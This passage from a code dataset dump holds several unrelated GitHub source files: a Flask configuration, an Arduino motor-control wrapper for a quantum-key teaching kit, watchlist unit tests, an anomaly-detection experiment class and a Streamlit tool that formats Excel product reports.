\"\")\n ROOT_KEY = os.getenv(\"ROOT_KEY\", randomKey(12))\n SECRET_KEY = os.getenv(\"SECRET_KEY\", randomString(25))\n\n CSP = {\n \"default-src\": [\n \"'self'\",\n \"'unsafe-inline'\",\n \"fonts.googleapis.com\",\n \"fonts.gstatic.com\",\n ],\n \"img-src\": [\"*\", \"data:\", \"blob:\"],\n \"script-src\": [\"'self'\", \"'unsafe-inline'\", \"'unsafe-eval'\"],\n \"frame-src\": [\"docs.google.com\", \"www.google.com\", \"www.youtube.com\"],\n \"worker-src\": [],\n \"child-src\": [],\n \"connect-src\": [],\n }\n\n COMPRESS_MIMETYPES = [\n \"text/html\",\n \"text/css\",\n \"text/xml\",\n \"application/json\",\n \"application/javascript\",\n ]\n COMPRESS_LEVEL = 6\n COMPRESS_MIN_SIZE = 500\n SEND_FILE_MAX_AGE_DEFAULT = 31536000\n\n MAX_CONTENT_LENGTH = 50 * 1024 * 1024\n UPLOAD_FOLDER = \"app/uploads\"\n UPLOAD_EXTENSIONS = {\n \"bmp\",\n \"gif\",\n \"jpg\",\n \"jpeg\",\n \"png\",\n \"webp\",\n \"avi\",\n \"mov\",\n \"mp4\",\n \"webm\",\n }\n\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n\nclass DevConfig(Config):\n ENVIRONMENT = \"development\"\n SQLALCHEMY_DATABASE_URI = f\"sqlite:///{ os.getenv('DEV_DB_FILE', '')}\"\n\n\nclass ProdConfig(Config):\n ENVIRONMENT = \"production\"\n\n user = os.getenv(\"DB_USER\")\n 
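# The remaining connection settings are read from DB_PASS, DB_HOST and DB_NAME below; DB_HOST falls back to 127.0.0.1 when unset.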
password = os.getenv(\"DB_PASS\")\n    server = os.getenv(\"DB_HOST\", \"127.0.0.1\")\n    database = os.getenv(\"DB_NAME\")\n\n    SQLALCHEMY_DATABASE_URI = f\"mysql://{ user }:{ password }@{ server }/{ database }?ssl=true&charset=utf8mb4\"\n","repo_name":"CabotScouts/virtual-camp","sub_path":"site/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"71467066473","text":"\"\"\"\nDescription: Package for servo motor controls. Python wrapper for Arduino serial commands \nto talk to the motor. Contains a single 'MotorControl' class.\n\nUsage: Only for Alice and Bob. Slight modifications will need to be made to talk to Eve's motors.\n\nAuthors: Qcumber 2018, Xi Jie\n\nVersion: 1.0\n\"\"\"\nimport serial\nimport time\n\nclass MotorControl(object):\n# Module for communicating with the Arduino analog pin\n\n\tdef __init__(self, port):\n\t\tself.baudrate = 38400 # Arduino baudrate\n\t\tself.serial = serial.Serial(port = port, baudrate = self.baudrate, timeout=3)\n\t\tstuck_flag = True\n\t\twhile stuck_flag:\n\t\t\tself.serial.write('ANG? '.encode())\n\t\t\tif not self.serial.in_waiting:\n\t\t\t\t# print(\"Stuck... Retrying\")\n\t\t\t\tif not self.serial.isOpen():\n\t\t\t\t\tself.serial = serial.Serial(port, timeout=3)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.serial.reset_input_buffer()\n\t\t\t\tprint(\"Program Launched Successfully\")\n\t\t\t\tstuck_flag = not stuck_flag\n\n\tdef close_port(self):\n\t\tif self.serial.is_open:\n\t\t\tself.serial.close()\n\n\tdef get_voltage(self):\n\t\tself.serial.write('VOLT? '.encode())\n\t\tvoltage_bit = float(self.readline_fix()) # Remove /n, change str to float\n\t\tvoltage = voltage_bit/1024*5 # Convert from bit range to voltage (0-1023 --> 0-5V)\n\t\treturn voltage\n\n\tdef set_angle(self,angle):\n\t\t#Sets the absolute angle of the motor stepper\n\t\twriteStr = 'SETANG ' + str(angle) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_angle(self):\n\t\t#Gets the absolute angle of the motor stepper\n\t\tself.serial.write('ANG? '.encode())\n\t\tangle = self.readline_fix()\n\t\treturn angle\n\n\tdef set_offset(self,angle):\n\t\t#Sets the offset angle of the motor stepper at H polarisation\n\t\twriteStr = 'SETHOF ' + str(angle) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_offset(self):\n\t\t#Gets the offset angle of the motor stepper at H polarisation\n\t\tself.serial.write('HOF? '.encode())\n\t\tangle = self.readline_fix()\n\t\treturn angle\n\n\tdef set_pol(self, pol):\n\t\t# Sets the polarization to 0,1,2,3 - H,D,V,A\n\t\twriteStr = 'SETPOL ' + str(pol) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_pol(self):\n\t\t# Gets the polarization 0,1,2,3 - H,D,V,A\n\t\tself.serial.write('POL? '.encode())\n\t\tpol = self.readline_fix()\n\t\treturn pol\n\n\tdef set_threshold(self,threshold):\n\t\t#Sets the detector threshold from 0-1023. 200 is approx. 1V\n\t\twriteStr = 'SETTH ' + str(threshold) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_threshold(self):\n\t\t#Gets the detector threshold from 0-1023. 200 is approx. 1V\n\t\tself.serial.write('TH? 
'.encode())\n\t\tthreshold = self.readline_fix()\n\t\treturn threshold\n\n\tdef power_on(self):\n\t\t#Powers on laser\n\t\tself.serial.write(\"LASON \".encode())\n\t\tself.readline_fix()\n\n\tdef readline_fix(self):\n\t\twhile True:\n\t\t\tif self.serial.in_waiting:\n\t\t\t\treturn self.serial.readline()[:-2].decode()\n\n\tdef power_off(self):\n\t\t#Powers off laser\n\t\tself.serial.write(\"LASOFF \".encode())\n\t\tself.readline_fix()","repo_name":"s-fifteen-instruments/Quantum_Cryptography_Educational_Kit_EKPQC","sub_path":"programs/2_QuantumKey/AlignmentGUI/motorControls.py","file_name":"motorControls.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25667355050","text":"import unittest\n\nfrom flask import json\n\nfrom app import create_app, db\nfrom app.models import Stock, User, Watchlist\nfrom test.sample_requests import *\n\n\nclass RemoveFromWatchlistTestCase(unittest.TestCase):\n \"\"\"This class represents removing stock from watchlist test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app(config_name=\"testing\")\n self.client = self.app.test_client\n\n # binds the app to the current context\n with self.app.app_context():\n # create all tables\n db.create_all()\n\n # Insert testing data\n Stock(test_stock_1_ticker, test_stock_1_date, close=test_stock_1_close).save()\n User(test_user_id, test_user_name).save()\n Watchlist(test_add_stock, test_user_id).save()\n\n def test_denied(self):\n \"\"\"Test if the remove from watchlist dialog without confirmation works.\n Flow, there is a stock in users watchlist, user asks to remove it but\n denies it afterwards.\"\"\"\n\n # Setup: check if there is stock in users watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertIn(test_add_stock, watchlist)\n\n # Step 1 ask to remove stock (stock present)\n res = self._remove_from_watchlist(test_add_stock)\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_ask_confirmation,\n str(res.data))\n\n # Step 2 deny removing the stock\n # Prepare request\n request = json.dumps(intent_remove_from_watchlist_deny())\n\n # Execute\n res = self.client().post('/api/', data=request,\n content_type='application/json')\n\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_denied,\n str(res.data))\n # Check if stock is still in watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertIn(test_add_stock, watchlist)\n\n def test_confirmed(self):\n \"\"\"Test if the remove from watchlist dialog confirmed works.\n Flow, there is a stock in users watchlist, user asks to remove it but\n denies it afterwards.\"\"\"\n # Setup: check if there is stock in users watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertIn(test_add_stock, watchlist)\n\n # Step 1 ask to remove stock (stock present)\n res = self._remove_from_watchlist(test_add_stock)\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_ask_confirmation,\n str(res.data))\n\n # Step 2 Confirm removing the stock\n # Prepare request\n request = json.dumps(intent_remove_from_watchlist_confirm())\n\n # Execute\n res = self.client().post('/api/', data=request,\n 
content_type='application/json')\n\n        # Assert\n        self.assertEqual(res.status_code, 200)\n        self.assertIn(RESPONSE_intent_remove_from_watchlist_confirmed\n                      .format(test_add_stock),\n                      str(res.data))\n        # Check if stock was removed from watchlist\n        with self.app.app_context():\n            watchlist = Watchlist.get_users_tickers(test_user_id)\n            self.assertNotIn(test_add_stock, watchlist)\n\n    def test_watchlist_empty(self):\n        \"\"\"Test removing stock from watchlist when watchlist is empty.\"\"\"\n\n        # Setup: check the target stock is not in users watchlist\n        with self.app.app_context():\n            watchlist = Watchlist.get_users_tickers(test_user_id)\n            self.assertNotIn(test_stock_1_ticker, watchlist)\n\n        # Step 1 ask to remove stock (stock not present)\n        res = self._remove_from_watchlist(test_stock_1_ticker)\n        # Assert\n        self.assertEqual(res.status_code, 200)\n        self.assertIn(RESPONSE_intent_remove_from_watchlist_not_there,\n                      str(res.data))\n\n    def _remove_from_watchlist(self, ticker):\n        \"\"\"Test removing stock from watchlist, no assertion.\n        :return: response to the request\"\"\"\n        # Prepare request\n        request = json.dumps(intent_remove_from_watchlist(ticker))\n\n        # Execute\n        res = self.client().post('/api/', data=request,\n                                 content_type='application/json')\n        return res\n\n    def tearDown(self):\n        \"\"\"teardown all initialized variables.\"\"\"\n        with self.app.app_context():\n            # drop all tables\n            db.session.remove()\n            db.drop_all()\n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"drabekj/OttoBot-Alexa-Skill","sub_path":"test/test_remove_from_watchlist.py","file_name":"test_remove_from_watchlist.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"40558468841","text":"from model.ae_flow_model import AE_Flow_Model\nfrom model.Auto_encoder_seperate import AE_Model\nfrom anomalib.models.fastflow.torch_model import FastflowModel\nfrom dataloader import load, split_data, fold_to_loaders\nimport torch.utils.data as data\nimport torch\n\n# We use this object to keep track of experiment/run relevant information, \n# especially to deal with datasets that are organized into multiple subsets.\nclass Experiment():\n    \n    def __init__(self, args, verbose=True):\n\n        super().__init__()\n        self.dataset = args.dataset\n        self.args = args\n\n        if self.dataset == 'btech':\n            self.subsets = ['01', '02', '03']\n            self.anomalib_dataset = True\n        elif self.dataset == 'mvtec':\n            self.subsets = ['pill', 'toothbrush', 'wood', 'grid', 'capsule', 'transistor', 'screw', 'carpet', 'cable', 'bottle', 'tile', 'metal_nut', 'hazelnut', 'leather', 'zipper']\n            self.anomalib_dataset = True\n        else:\n            self.subsets = [None]\n            self.anomalib_dataset = False\n        \n        self.verbose = verbose\n        self.model = None\n\n    def initialize_model(self, current_subset):\n        self.current_subset = current_subset\n        self.subset_results = []\n        if self.args.model == 'ae_flow': self.model = AE_Flow_Model(subnet_architecture=self.args.subnet_architecture, n_flowblocks=self.args.n_flowblocks)\n        elif self.args.model == 'fastflow':\n            if self.dataset in ['btech', 'mvtec']:\n                input_size = (256, 256)\n            else:\n                input_size = (224, 224)\n            self.model = FastflowModel(input_size=input_size, backbone=\"wide_resnet50_2\", flow_steps=8, pre_trained=False)\n            self.model.training = True\n\n        elif self.args.model == 'autoencoder':\n            self.model = AE_Model()\n        else:\n            raise NotImplementedError\n    \n    def load_data(self):\n\n        if self.current_subset is not None: print(f'Running on subset: 
{self.current_subset}')\n self.train_loader, self.train_abnormal, self.test_loader = load(data_dir=self.args.dataset,batch_size=self.args.batch_size, num_workers=self.args.num_workers, subset=self.current_subset, anomalib_dataset=self.anomalib_dataset)\n self.train_split_normal, self.test_split_normal, self.train_split_abnormal, self.test_split_abnormal = split_data(n_splits=self.args.n_validation_folds, normal_data=self.train_loader, \n abnormal_data=self.train_abnormal)\n\n test_split_normal_all = [item for sublist in self.test_split_normal for item in sublist]\n test_split_abnormal_all = [item for sublist in self.test_split_abnormal for item in sublist]\n\n test_split_normall = torch.utils.data.dataset.Subset(self.train_loader,test_split_normal_all)\n test_split_abnormall = torch.utils.data.dataset.Subset(self.train_abnormal,test_split_abnormal_all)\n self.checkpoint_loader = data.DataLoader(torch.utils.data.ConcatDataset([test_split_normall, test_split_abnormall]), num_workers = 3, batch_size=64)\n \n self.threshold_loader_all = data.DataLoader(torch.utils.data.ConcatDataset([self.train_loader, self.train_abnormal]), num_workers = 3, batch_size=64)\n \n def load_fold_data(self, fold):\n return fold_to_loaders(fold, self.train_split_normal, self.test_split_normal,self.train_split_abnormal, self.test_split_abnormal, self.args.num_workers, self.train_loader, self.train_abnormal)\n ","repo_name":"pimpraat/ae_flow","sub_path":"src/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72422354152","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\nimport os, sys\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom openpyxl import *\r\nfrom openpyxl import load_workbook\r\nfrom openpyxl.styles import Alignment, Border,Font, PatternFill, Side\r\nfrom openpyxl.utils.cell import get_column_letter\r\n\r\nst.set_page_config(\r\n page_title=\"GPIM Automation Hub\",\r\n layout=\"centered\",\r\n initial_sidebar_state=\"auto\", \r\n)\r\n\r\nhide_st_style = '''\r\n '''\r\nst.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\nif 'greeting' not in st.session_state:\r\n st.session_state.greeting = \"Hello, there!\"\r\n# st.write(st.session_state)\r\n\r\nwith st.sidebar:\r\n selected = option_menu(menu_title=None, options = [\"GDID\", \"Settings\"], \r\n icons=['file-earmark-fill', 'gear'], menu_icon=\"list\", default_index=0) # orientation=\"horizontal\"\r\n\r\n\r\nwb0 = load_workbook(\"Settings.xlsx\", data_only=True)\r\nws0 = wb0.active\r\n\r\nmain_locales = []\r\nfor x in range(2, ws0.max_column + 1):\r\n if not x == \"\":\r\n main_locales.append(ws0.cell(row=2, column=x).value)\r\n\r\ndownload_folder = ws0[\"B1\"].value # Default download location\r\n\r\nif selected == \"Settings\": \r\n col1, col2, col3 = st.columns(3)\r\n with col3:\r\n openxl = st.button(\"Open Settings file\", type=\"secondary\", use_container_width=True)\r\n if openxl:\r\n os.startfile(\"Settings.xlsx\") \r\n\r\n tab1, tab2 = st.tabs([\"GDID template Generator\",\"Coming soon\"])\r\n with tab1:\r\n col1, col2 = st.columns(2) \r\n with col1:\r\n new_locale = st.text_input(\"Add any new Locale here.\", key=\"new_locale\", placeholder=\"Add any new Locale here.\", label_visibility=\"collapsed\")\r\n with col2: \r\n new_location = st.text_input(\"Update your download location here.\", key=\"new_location\", placeholder=\"Update your download location here.\", 
label_visibility=\"collapsed\")\r\n\r\n saved = st.button(\"Save\", type=\"primary\", use_container_width=True)\r\n if saved:\r\n if not new_locale == \"\":\r\n if new_locale not in main_locales:\r\n ws0.cell(row=2, column= ws0.max_column + 1).value = new_locale\r\n wb0.save(\"Settings.xlsx\")\r\n st.info(\"New settings are saved.\", icon=\"ℹ️\")\r\n else:\r\n st.warning(\"Locale already exists.\", icon=\"ℹ️\")\r\n\r\n if not new_location == \"\": \r\n if not new_location == download_folder:\r\n ws0[\"B1\"].value = new_location\r\n wb0.save(\"Settings.xlsx\")\r\n st.info(\"New settings are saved.\", icon=\"ℹ️\")\r\n else:\r\n st.warning(\"Default download location is the same.\", icon=\"ℹ️\")\r\n\r\n\r\nif selected == \"GDID\": \r\n st.title(\"GDID template Generator\")\r\n st.write(\"######\")\r\n\r\n locale = st.selectbox('Please select the main Locale.', (main_locales))\r\n st.write(\"######\")\r\n uploaded_file = st.file_uploader(\"Please upload 'GDID' report and click 'Generate' button below.\", type=[\"xlsx\"], accept_multiple_files=False, label_visibility=\"visible\")\r\n submitted = st.button(\"Generate\", type=\"primary\", use_container_width=True) \r\n\r\n if submitted:\r\n if uploaded_file is not None:\r\n filename = str(uploaded_file.name) \r\n if not filename.find(\"GDID\") == -1:\r\n df0 = pd.read_excel( uploaded_file, sheet_name=0, engine='openpyxl')\r\n\r\n rows_cnt = df0.shape[0] # Number of Rows == rows_cnt\r\n skus = list(df0['SKU'])\r\n st.write(\"SKU Count :\", rows_cnt)\r\n\r\n if df0['SKU'].isnull().sum() == rows_cnt: \r\n df0.insert(4, '10/11?', np.nan)\r\n else:\r\n df0.insert(4, '10/11?', list(map(lambda x: len(str(x)), skus)))\r\n\r\n headers0 = list(df0.columns.values)\r\n locale_included = [col for col in headers0 if locale in col]\r\n if len(locale_included) == 0:\r\n st.warning(\"Report does NOT contain the main Locale.\", icon=\"ℹ️\")\r\n sys.exit()\r\n \r\n headers1 = headers0.copy()\r\n headers1.remove('Division')\r\n headers1.remove('Commodity Class')\r\n headers1.remove('GPH Path')\r\n headers1.remove('Marketplace Formal Name')\r\n\r\n st.write(\"Started arranging columns in order!\")\r\n mpfns=[]; dscs=[]; ldscs=[]; b1s=[]; b2s=[]; b3s=[]; b4s=[]; b5s=[]; b6s=[]; b7s=[]; b8s=[]; b9s=[]; b10s=[]; b11s=[]; b12s=[]; b13s=[]; b14s=[]; b15s=[]; pics1=[]; pics2=[]; docs=[]; brnds=[]; mkt1s=[]; mkt2s=[]; mkt3s=[]\r\n for i in headers0: # Split columns by Attributes(column names) required to update Values for\r\n if i.endswith(\" — Marketplace Formal Name\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mpfns.insert(0, i) # Move the column of target locale to the first item in the list\r\n else:\r\n mpfns.append(i)\r\n elif i.endswith(\" — Marketplace Description\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n dscs.insert(0, i)\r\n else:\r\n dscs.append(i)\r\n elif i.endswith(\" — Marketplace Description Extended\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n ldscs.insert(0, i)\r\n else:\r\n ldscs.append(i)\r\n elif i.endswith(\" — Bullet 1\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b1s.insert(0, i)\r\n else:\r\n b1s.append(i) # List for Bullet 1 columns\r\n elif i.endswith(\" — Bullet 2\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b2s.insert(0, i)\r\n else:\r\n b2s.append(i)\r\n elif i.endswith(\" — Bullet 3\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b3s.insert(0, i)\r\n else:\r\n b3s.append(i)\r\n elif i.endswith(\" — Bullet 4\"):\r\n 
headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b4s.insert(0, i)\r\n else:\r\n b4s.append(i)\r\n elif i.endswith(\" — Bullet 5\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b5s.insert(0, i)\r\n else:\r\n b5s.append(i)\r\n elif i.endswith(\" — Bullet 6\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b6s.insert(0, i)\r\n else:\r\n b6s.append(i)\r\n elif i.endswith(\" — Bullet 7\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b7s.insert(0, i)\r\n else:\r\n b7s.append(i)\r\n elif i.endswith(\" — Bullet 8\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b8s.insert(0, i)\r\n else:\r\n b8s.append(i)\r\n elif i.endswith(\" — Bullet 9\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b9s.insert(0, i)\r\n else:\r\n b9s.append(i)\r\n elif i.endswith(\" — Bullet 10\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b10s.insert(0, i)\r\n else:\r\n b10s.append(i)\r\n elif i.endswith(\" — Bullet 11\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b11s.insert(0, i)\r\n else:\r\n b11s.append(i)\r\n elif i.endswith(\" — Bullet 12\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b12s.insert(0, i)\r\n else:\r\n b12s.append(i)\r\n elif i.endswith(\" — Bullet 13\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b13s.insert(0, i)\r\n else:\r\n b13s.append(i)\r\n elif i.endswith(\" — Bullet 14\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b14s.insert(0, i)\r\n else:\r\n b14s.append(i)\r\n elif i.endswith(\" — Bullet 15\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b15s.insert(0, i)\r\n else:\r\n b15s.append(i)\r\n elif i.endswith(\" — Brand\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n brnds.insert(0, i)\r\n else:\r\n brnds.append(i)\r\n elif i.endswith(\"FUZE Market Level 1\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mkt1s.insert(0, i)\r\n else:\r\n mkt1s.append(i)\r\n elif i.endswith(\"FUZE Market Level 2\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mkt2s.insert(0, i)\r\n else:\r\n mkt2s.append(i)\r\n elif i.endswith(\"FUZE Market Level 3\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mkt3s.insert(0, i)\r\n else:\r\n mkt3s.append(i)\r\n elif not i.find(\" — Main Picture\") == -1:\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n pics1.insert(0, i)\r\n else:\r\n pics1.append(i) \r\n\r\n headers2 = headers1.copy()\r\n for j in headers1: # Remove columns of Null Values\r\n if j in ['10/11?', 'Commodity Class', 'Variant SKU', 'SKU']:\r\n continue\r\n if df0[j].isnull().sum() == rows_cnt:\r\n headers2.remove(j)\r\n\r\n headers3 = headers2.copy()\r\n for k in headers2: \r\n if not k.find(\" — Additional Picture\") == -1:\r\n headers3.remove(k)\r\n pics2.append(k)\r\n elif not k.find(\" — Doc\") == -1:\r\n headers3.remove(k)\r\n docs.append(k)\r\n\r\n bullets0 = [b5s, b6s, b7s, b8s, b9s, b10s, b11s, b12s, b13s, b14s, b15s] \r\n bullets1 = bullets0.copy()\r\n mkts0 = [mkt2s, mkt3s]\r\n mkts1 = mkts0.copy()\r\n\r\n for bullet in bullets0: # to check if Vales are available for each Attribute and delte the relevant columns \r\n nan1 = df0[bullet].isnull().sum()\r\n if nan1.sum()/len(nan1) == rows_cnt:\r\n bullets1.remove(bullet)\r\n bullets2 = [second for first in bullets1 for second in first]\r\n\r\n for mkt in mkts0:\r\n nan3 = df0[mkt].isnull().sum()\r\n if nan3.sum()/len(nan3) == rows_cnt:\r\n mkts1.remove(mkt) \r\n mkts2 = [second for first in mkts1 for 
second in first]\r\n st.write(\"Columns of Null values are deleted.\")\r\n \r\n headers3[5:5] = docs\r\n headers3[5:5] = pics2\r\n headers3[5:5] = brnds\r\n headers3[5:5] = mkts2\r\n headers3[5:5] = mkt1s\r\n headers3[5:5] = pics1\r\n headers3[5:5] = bullets2\r\n headers3[5:5] = b4s\r\n headers3[5:5] = b3s\r\n headers3[5:5] = b2s\r\n headers3[5:5] = b1s\r\n if not df0[ldscs].isnull().sum().sum()/len(df0[ldscs].isnull().sum()) == rows_cnt:\r\n headers3[5:5] = ldscs\r\n headers3[5:5] = dscs\r\n headers3[5:5] = mpfns\r\n headers3.insert(1, 'GPH Path')\r\n headers3.insert(1, 'Commodity Class')\r\n headers3.insert(1, 'Division')\r\n st.write(\"The rest of columns are now reordered.\")\r\n \r\n df1 = df0[headers3]\r\n df1 = df1.astype({\"Base SKU\": 'str'})\r\n df1.sort_values(by='Base SKU', ascending=True, inplace=True) # Sort by Base coulmn\r\n df1.to_excel(\"Digitization Template.xlsx\", index=False)\r\n\r\n wb = load_workbook(\"Digitization Template.xlsx\", data_only=True)\r\n ws = wb.active \r\n\r\n ws.insert_rows(1) # for validation/gap filling required \r\n ws.row_dimensions[2].height = 40\r\n for r1 in range(3, ws.max_row + 1):\r\n ws.row_dimensions[r1].height = 20 \r\n\r\n for c1 in range(1, ws.max_column + 1): # Set styles for header rows (row 2)\r\n ws.cell(row=2, column=c1).fill = PatternFill(fgColor=\"D4D4D4\", fill_type=\"solid\")\r\n ws.cell(row=2, column=c1).font = Font(name=\"Arial\", size=9, bold=True, color=\"000000\")\r\n ws.cell(row=2, column=c1).alignment = Alignment(horizontal=\"center\",wrap_text=True)\r\n ws.cell(row=2, column=c1).border = Border(left=Side(style=\"thin\", color=\"808080\"), right=Side(style=\"thin\", color=\"808080\"),top=Side(style=\"thin\", color=\"808080\"),bottom=Side(style=\"thin\", color=\"808080\"))\r\n\r\n ws.column_dimensions[\"A\"].width = 8\r\n ws.column_dimensions[\"H\"].width = 8 \r\n for c2 in range(2, 8):\r\n ws.column_dimensions[get_column_letter(c2)].width = 12\r\n \r\n for c3 in range(9, ws.max_column + 1):\r\n if ws.cell(row=2, column=c3).value == \"Locale\":\r\n break\r\n ws.column_dimensions[get_column_letter(c3)].width = 20\r\n if not ws.cell(row=2, column=c3).value.find(locale) == -1:\r\n ws.cell(row=2, column=c3).fill = PatternFill(fgColor=\"FFC000\", fill_type=\"solid\")\r\n \r\n mpfns_idx=[]; dscs_idx=[]; b1s_idx=[]; b2s_idx=[]; b2s_idx=[]; b3s_idx=[]; b4s_idx=[]; pics1_idx=[]; mkt1s_idx=[]; vals=[]\r\n for idx, attr in enumerate(ws[2]):\r\n if attr.value in mpfns:\r\n mpfns_idx.append(idx+1)\r\n elif attr.value in dscs:\r\n dscs_idx.append(idx+1)\r\n elif attr.value in b1s:\r\n b1s_idx.append(idx+1)\r\n elif attr.value in b2s:\r\n b2s_idx.append(idx+1)\r\n elif attr.value in b3s:\r\n b3s_idx.append(idx+1)\r\n elif attr.value in b4s:\r\n b4s_idx.append(idx+1)\r\n elif attr.value in pics1:\r\n pics1_idx.append(idx+1)\r\n elif attr.value in mkt1s:\r\n mkt1s_idx.append(idx+1)\r\n\r\n def coloring (mindx, maxdx):\r\n for row in ws.iter_rows(min_row=3, max_row=ws.max_row, min_col=mindx, max_col=maxdx):\r\n if not row[0].value is None: \r\n continue\r\n vals.clear() \r\n for cell in row: \r\n if not cell.value is None:\r\n vals.append(cell.value)\r\n if len(vals) < 1:\r\n row[0].fill = PatternFill(fgColor=\"FECCCC\", fill_type=\"solid\") # Color the Target Locale Cell RED\r\n else:\r\n row[0].fill = PatternFill(fgColor=\"FFF1CD\", fill_type=\"solid\") # Color the Target Locale Cell YELLOW \r\n\r\n coloring (mpfns_idx[0], mpfns_idx[-1])\r\n coloring (dscs_idx[0], dscs_idx[-1])\r\n coloring (b1s_idx[0], b1s_idx[-1])\r\n coloring 
(b2s_idx[0], b2s_idx[-1])\r\n coloring(b3s_idx[0], b3s_idx[-1])\r\n coloring(b4s_idx[0], b4s_idx[-1])\r\n coloring(pics1_idx[0], pics1_idx[-1])\r\n coloring(mkt1s_idx[0], mkt1s_idx[-1])\r\n\r\n label_cols = [mpfns_idx[0], dscs_idx[0], b1s_idx[0], b2s_idx[0], b3s_idx[0], b4s_idx[0], pics1_idx[0], mkt1s_idx[0]]\r\n for c4 in label_cols: # Set styles for columns for Target Locale (Labeling) \r\n ws.cell(row=1, column=c4).fill = PatternFill(fgColor=\"002060\", fill_type=\"solid\")\r\n ws.cell(row=1, column=c4).value = 'Validation/Gap Filling Required'\r\n ws.cell(row=1, column=c4).font = Font(name= \"Arial\", size=9, color=\"FFFFFF\")\r\n ws.cell(row=1, column=c4).alignment = Alignment(horizontal=\"center\",wrap_text=True)\r\n st.write(\"Styles for header rows & color coding for blank cells are applied.\")\r\n \r\n st.write(\"Just started applying styles for the data cells.\")\r\n for row2 in ws.iter_rows(min_row=3, max_row=ws.max_row, min_col=1, max_col = ws.max_column):\r\n for cell2 in row2:\r\n cell2.alignment = Alignment(wrap_text=True)\r\n cell2.font = Font(name=\"Arial\", size=9) \r\n cell2.border = Border(left=Side(style=\"thin\", color=\"808080\"), right=Side(style=\"thin\", color=\"808080\"),top=Side(style=\"thin\", color=\"808080\"),bottom=Side(style=\"thin\", color=\"808080\")) \r\n\r\n ws.freeze_panes = ws[\"I3\"]\r\n ws.auto_filter.ref = \"A2:{}{}\".format(get_column_letter(ws.max_column), ws.max_row)\r\n \r\n wb.save(\"Digitization Template.xlsx\")\r\n os.startfile(\"Digitization Template.xlsx\")\r\n else:\r\n st.warning(\"You may have uploaded a wrong report.\", icon=\"ℹ️\")\r\n else:\r\n st.warning(\"Please upload GDID report first.\", icon=\"ℹ️\")\r\n\r\n","repo_name":"SeongjoRa/gdid","sub_path":"gdid.py","file_name":"gdid.py","file_ext":"py","file_size_in_byte":20072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
